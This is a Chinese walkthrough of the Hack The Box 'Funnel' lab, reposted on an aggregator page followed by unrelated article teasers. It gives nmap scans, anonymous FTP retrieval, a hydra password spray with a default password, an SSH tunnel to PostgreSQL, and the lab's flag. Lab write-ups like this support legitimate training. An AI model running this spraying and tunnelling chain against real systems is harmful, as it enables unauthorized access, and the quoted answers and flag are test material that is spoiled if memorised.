[StartingPoint][Tier1]Funnel

Task 1

How many TCP ports are open?

(打开了多少个 TCP 端口?)

# nmap -sS -T4 10.129.224.226 --min-rate 1000

2

Task 2

What is the name of the directory that is available on the FTP server?

(FTP 服务器上可用的目录名称是什么?)

$ nmap -sC 10.129.224.226 -p 21

image.png

21端口存在匿名访问

mail_backup

Task 3

What is the default account password that every new member on the “Funnel” team should change as soon as possible?

(“漏斗”团队的每个新成员应该尽快更改的默认帐户密码是什么?)

ftp> get ./mail_backup/password_policy.pdf ./1.pdf

image.png

image.png

funnel123#!#

Task 4

Which user has not changed their default password yet?

(哪个用户还没有更改过默认密码?)

-users.txt-
optimus
albert
andreas
christine
maria

$ hydra -L ./users.txt -p funnel123#!# ssh://10.129.224.226

christine

Task 5

Which service is running on TCP port 5432 and listens only on localhost?

(哪个服务在 TCP 端口 5432 上运行并且仅侦听本地主机?)

# nmap -sV -p 5432 10.129.224.226

image.png

postgresql

Task 6

Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?

(由于您无法从本地计算机访问前面提到的服务,因此您必须创建一个隧道并从您的计算机连接到它。正确使用的隧道类型是什么?远程端口转发还是本地端口转发?)

  • 本地端口转发(Local Port Forwarding): 在本地端口转发中,客户端建立一个到远程服务器的连接,并在本地主机上创建一个监听指定端口的服务。当有数据发送到本地监听的端口时,数据被加密并发送到远程服务器,然后远程服务器将其解密并转发到最终的目标。这种方式可以让客户端访问无法直接访问的服务,或者增加数据传输的安全性。本地端口转发常用于构建加密隧道,例如通过 SSH 连接远程服务器并转发本地端口以访问内部网络资源。
    ssh -L [本地地址:]本地端口:目标地址:目标端口 用户名@远程主机

  • 远程端口转发(Remote Port Forwarding): 在远程端口转发中,远程服务器建立一个到本地主机的连接,并在远程服务器上创建一个监听指定端口的服务。当有数据发送到远程服务器上的监听端口时,数据被转发到本地主机,然后本地主机将其处理。这种方式通常用于使远程服务器上的服务能够被外部访问,或者用于跨越 NAT 或防火墙访问内部网络资源。
    ssh -R [远程地址:]远程端口:目标地址:目标端口 用户名@远程主机

local port forwarding

Task 7

$ ssh -L 4444:10.129.224.226:5432 christine@10.129.224.226

image.png

让远程服务器转发自己的5432端口服务到我们主机的4444端口

连接本地转发端口

$ psql -U christine -h localhost -p 4444

image.png

christine=# \list

image.png

secrets

Task 8

Could you use a dynamic tunnel instead of local port forwarding? Yes or No.

(你能利用一个动态的隧道,而不是当地的港口转发? “是"或"否”。)

yes

Flag

christine=#\connect secrets

image.png

christine=#\dt

image.png

secrets=# select * from flag;

image.png

cf277664b1771217d7006acdea006db1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/797982.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据库系统概论(超详解!!!)第三节 关系数据库标准语言SQL(Ⅵ)

1.空值的处理 空值就是“不知道”或“不存在”或“无意义”的值。 一般有以下几种情况: 该属性应该有一个值,但目前不知道它的具体值 ;该属性不应该有值 ;由于某种原因不便于填写。 1.空值的产生 空值是一个很特殊的值&#x…

云仓酒庄旗下雷盛红酒入驻香港星怡SingLa餐厅共绘美食美酒新篇章

近日,云仓酒庄旗下品牌雷盛红酒正式入驻香港餐厅星怡SingLa,这一跨界合作不仅为香港市民和游客带来了全新的味蕾享受,也标志着美食与美酒文化的很好结合,共同绘就了一幅精彩绝伦的美食美酒新篇章。 云仓酒庄一直以来都致力于为消费…

Rust 程序设计语言学习——枚举模式匹配

枚举(enumerations),也被称作 enums。match 允许我们将一个值与一系列的模式相比较,并根据相匹配的模式执行相应代码。 1 枚举的定义 假设我们要跨省出行,有多种交通工具供选择。常用的交通工具有飞机、火车、汽车和轮…

备战蓝桥杯Day37 - 真题 - 特殊日期

一、题目描述 思路: 1、统计2000年到2000000年的日期,肯定是需要遍历 2、闰年的2月是29天,非闰年的2月是28天。我们需要判断这一年是否是闰年。 1、3、5、7、8、10、12月是31天,4、6、9、11月是30天。 3、年份yy是月份mm的倍数…

【Entity Framework】EF配置文件设置详解

【Entity Framework】EF配置文件设置详解 文章目录 【Entity Framework】EF配置文件设置详解一、概述二、实体框架配置部分三、连接字符串四、EF数据库提供程序五、EF侦听器六、将数据库操作记录到文件中七、Code First默认连接工厂八、数据库初始值设定项 一、概述 EF实体框架…

OKR应用层级与试点部门选择:管理层与员工层的应用探讨

OKR(Objectives and Key Results)作为一种高效的目标管理工具,其应用层级的选择对于企业的实施效果至关重要。在管理层和员工层之间,并没有绝对的先后顺序,而是需要根据企业的具体情况和需求进行灵活应用。同时&#x…

CODEFORCES --- 630A. Again Twenty Five!

630A. Again Twenty Five! 人力资源经理又失望了。最后一名应聘者和之前的 24 名应聘者一样,都没有通过面试。"我应该给这样一个艰巨的任务吗?- 人力资源经理想。“只要把数字 5 提高到 n 的幂,然后得到数字的最后两位就可以了。是的&a…

stata 数据匹配

横向匹配(增加变量)——merge merge 1:1 id using otherfile.dta匹配城市 merge m:1 city using "E:\基点.dta",nogen匹配上市公司 merge m:1 stkcd time using "E:\基点.dta",nogen匹配类型: 1:1: 1配1 m:1:多配1 …

QEMU介绍

原文位置:https://github.com/qemu/qemu 原文 QEMU is a generic and open source machine & userspace emulator and virtualizer. QEMU is capable of emulating a complete machine in software without any need for hardware virtualization support. B…

前端八股文面试题——webpack工程化

前端工程化面试题 webpack有哪些常见的loader? 你用过哪些loader?webpack 有哪些常见的Plugin? 你用过哪些Plugin?说说Loader 和Plugin 的区别作用上结构上 webpack 构建流程简单说一下使用webpack开发时,使用过哪些可以提高效率的插件?如何优化webp…

python买铅笔 2024年3月青少年电子学会等级考试 中小学生python编程等级考试一级真题答案解析

目录 python买铅笔 一、题目要求 1、编程实现 2、输入输出 二、算法分析 三、程序代码 四、程序说明 五、运行结果 六、考点分析 七、 推荐资料 1、蓝桥杯比赛 2、考级资料 3、其它资料 python买铅笔 2024年3月 python编程等级考试级编程题 一、题目要求 1、编…

习题3-4 统计学生成绩

本题要求编写程序读入N个学生的百分制成绩,统计五分制成绩的分布。百分制成绩到五分制成绩的转换规则: 大于等于90分为A;小于90且大于等于80为B;小于80且大于等于70为C;小于70且大于等于60为D;小于60为E。…

【电路笔记】-逻辑非门

逻辑非门 文章目录 逻辑非门1、概述2、晶体管逻辑非门3、六角施密特反相器逻辑非门是所有逻辑门中最基本的,通常称为反相缓冲器或简称为反相器。 1、概述 反相非门是单输入器件,其输出电平通常为逻辑电平“1”,当其单个输入为逻辑电平“1”时,输出电平变为“低”至逻辑电平…

通用爬虫的概念简述

一、🌈什么是通用爬虫 通用爬虫(General Purpose Web Crawler或Scalable Web Crawler)是一种网络爬虫,其设计目标是对整个互联网或尽可能广泛的网络空间进行数据抓取。通用爬虫主要用于搜索引擎构建其庞大的网页索引数据库&#…

FineReport安装后,启动报错:get tomcat thread pool info error

报错信息如下,一堆堆的错误: 1、get tomcat thread pool info error 2、lineofficial plugin is not istalled 3、line...not installed 4、lark... 5、dingtalk ... 最后解决方案: 1、安装java jdk1.8 2、安装了tomcat 8 安装版 3、…

MBTI测试深度解析:从性格类型看职业选择与发展方向!(包含开源免费的API接口)

MBTI简介 迈尔斯-布里格斯类型指标(Myers–Briggs Type Indicator,MBTI)是由美国作家伊莎贝尔布里格斯迈尔斯和她的母亲凯瑟琳库克布里格斯共同制定的一种人格类型理论模型。 该指标以瑞士心理学家卡尔荣格划分的8种心理类型为基础&#xff…

使用LIMIT进行分页

SELECT employee_id, first_name, salary FROM employees LIMIT 0, 5; 0为偏移量, 5为条目数 每页pageSize条记录,显示第page页 LIMIT (page - 1) * pageSize, pageSize; # 或者 LIMIT pageSize OFFSET (page - 1) * pageSize;

备战蓝桥杯---递归与DFS刷题2

1. 数据范围允许直接暴力把所有组合都写一遍,我们用Pair来存,在sort中分式比较只要把自己的分子与对方的分母乘比较即可,下面介绍一下st树的写法,具体原理就不说了,它是先[0/1,1/1]然后取分子分母的平均化成两个区间&a…

web学习笔记(五十三)身份认证

目录 1.Web 开发模式 1.1 服务端渲染的 Web 开发模式 1.2 服务端渲染的优缺点 1.3 前后端分离的 Web 开发模式 1.4 如何选择 Web 开发模式 2. 身份认证 2.1 Session 认证机制 3. 在 Express 中使用 Session 认证 3.1 安装express-session 中间件 3.2 配置 express-ses…

electron 打不同环境的包

我用的打包工具: electron-builder 1、在package.json 文件的同级下创建2个js文件 electron-builder-test.config.js electron-builder.config.js electron-builder-test.config.js const basejson require(./electron-builder.config.js); module.exports {extraMetada…